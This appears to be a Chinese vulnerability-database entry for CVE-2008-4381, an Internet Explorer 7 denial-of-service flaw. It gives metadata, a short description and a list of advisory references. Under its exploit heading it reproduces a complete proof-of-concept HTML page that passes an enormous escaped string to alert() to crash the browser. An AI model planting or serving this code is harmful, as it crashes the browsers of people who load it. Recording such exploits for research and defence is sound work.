microsoft internet_explorer alert函数资源管理错误漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185091 漏洞类型 资源管理错误
发布时间 2008-10-02 更新时间 2008-10-02
CVE编号 CVE-2008-4381 CNNVD-ID CNNVD-200810-019
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84762
https://cxsecurity.com/issue/WLB-2008100109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-019
|漏洞详情
MicrosoftInternetExplorer7允许远程攻击者通过一个URL编码中带大数量的无效字符的Javascript来调用alert函数引起拒绝服务(应用程序崩溃)。
|漏洞EXP
<!--

MS Internet Explorer 7 Denial Of Service Exploit

Type :

Denial Of Service

Release Date :

{2007-09-29}

Product / Vendor :

Microsoft

http://www.Microsoft.com

MS Internet Explorer 7 Denial Of Service Exploit :

-->

<title>MS Internet Explorer 7 Denial Of Service Exploit</title>

<body bgcolor="#000000">

<br>

<br>

<center><font face="Verdana" size="2" color="#FF0000"><b>MS Internet Explorer 7 Denial Of Service Exploit</b></font></center>

<br>

<center><img src="http://img81.imageshack.us/img81/8881/wallpaperxl0.jpg"></center>

<br>

<html>

<script>

var x=String.fromCharCode(550);

var x2="";

var x3="";

for(i=0;i<1549;i++)

{x2=x2+x;}

for(i=0;i<1549;i++)

{x3=x3+x2;}

var x4=x;

for(i=0;i<105;i++) x4 += x4;

for(i=0;i<165;i++) x4 += x3;

var wildboy=escape(x4);

alert(wildboy);

</script>

</html>

<center><font face="Verdana" size="2" color="#FF0000"><b>WiLdBoY a.k.a UniquE-Key{UniquE-Cracker} n.s.n Mert KAYALAR</b></font>

<br>

<font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG [email concealed]</b></font>

<br>

<font face="Verdana" size="2" color="#FF0000"><b>-Software Hunter-</b></font></center>

<!--

Tested :

MS Internet Explorer 7

Vulnerable :

MS Internet Explorer 6

MS Internet Explorer 5

Author :

WiLdBoY also known as UniquE-Key N.S.N Mert KAYALAR

UniquE[at]UniquE-Key[dot]ORG

-Software Hunter-

-->
|受影响的产品
Microsoft Internet Explorer Macintosh Edition 5
|参考资料

来源:XF
名称:ie-alert-function-dos(45639)
链接:http://xforce.iss.net/xforce/xfdb/45639
来源:BUGTRAQ
名称:20081001Re:MSInternetExplorer7DenialOfServiceExploit
链接:http://www.securityfocus.com/archive/1/archive/1/496926/100/0/threaded
来源:BUGTRAQ
名称:20080929MSInternetExplorer7DenialOfServiceExploit
链接:http://www.securityfocus.com/archive/1/archive/1/496830/100/0/threaded
来源:MLIST
名称:[oss-security]20081003Re:regardingCVE-2008-4382&CVE-2008-4381
链接:http://www.openwall.com/lists/oss-security/2008/10/03/8
来源:MLIST
名称:[oss-security]20081003regardingCVE-2008-4382&CVE-2008-4381
链接:http://www.openwall.com/lists/oss-security/2008/10/03/7
来源:SREASON
名称:4345
链接:http://securityreason.com/securityalert/4345